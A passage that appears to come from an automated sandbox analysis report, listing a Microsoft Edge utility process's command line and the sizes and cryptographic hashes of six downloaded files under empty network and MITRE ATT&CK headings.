  Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5240 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8
  PID: 4648
Network
MITRE ATT&CK Enterprise v15
Downloads
File 1
  Filesize: 4KB
  MD5: 23da8c3612b391292f5cdc51f7bcb018
  SHA1: eb345ba5705c1e629c8c44198b812619229693d3
  SHA256: 6cbc26e82f2a553f9828216b6851b859f57f05df2350666818965cd1e0064a28
  SHA512: 612c76f6045e861bbe0554ac69a57357bcfd68dbab0954e78db1009d5a71e551704880847f146dc43f934d4a8ce9d5e9b4b163a8acdb5401f44a2ef65ee790e7
File 2
  Filesize: 4KB
  MD5: 712c85f7347b1b9f2288a220c96b841e
  SHA1: 790e35b7d500cea6961c44011d958a2013768378
  SHA256: 70187e88c8446bdaa3eb7ea3bfc0db33c1f2e9641b5db95d0fa22dad724eb981
  SHA512: 1881a8c4156b12745c414736b68b21df4113dbf9c2744b04d6bbfe7dbc7f7336293b5cdc8008eafb59afa4314affec831d83d6d3b34d3e36b25d831e40cdd972
File 3
  Filesize: 446B
  MD5: 4b9bc21c7f74f2fd1c8ef11ea8c09490
  SHA1: 296a36eb7687b0436228329baa38f0256f13cd4d
  SHA256: 254427b2bba5cc34f90ad8877a55e16062511b746870497c596a215d2e3eb949
  SHA512: ed794cc51a27af7a6e571f68b854f1ac004c16c943939863e7a51e3dae449425f45d78445bfd24710823481ce4acfc61c92d639a4b14da52f67d1f41455f464a
File 4
  Filesize: 3KB
  MD5: 62848a3b8e3b67b5b36a517ad40a402a
  SHA1: 31db8d0589625d582c55a87c7877fcaa8c1b19ff
  SHA256: e070df27506a03e268388353f1de976f4e7c9c5ab152a48d8dc80f87c78ddd4e
  SHA512: 912cc731a569a3ee5c0f8c1f902c76f358e8366385f24d9bb59f8fffc530c408f7429c67dc3dab05b280f1903a8cc9fec6c927cd7c5daa3b27a1beb4a278a6ac
File 5
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
File 6
  Filesize: 475KB
  MD5: c990e3d829b26e351547c77df1bc5953
  SHA1: df0592b47bea01cc3199012205c3bf55545fb09e
  SHA256: f2108dfabed7091171e5c3219a76a955ae6b4d4632d685ead292f346ecf99822
  SHA512: f1f78838d6aae755d74f5dcb21b3d5b8f9100937caae28e0c7fdf6dcc39e382bc02e7040bdc4b682ac7148c987bb59f86aa3c36fa769dd85b40a0543361789da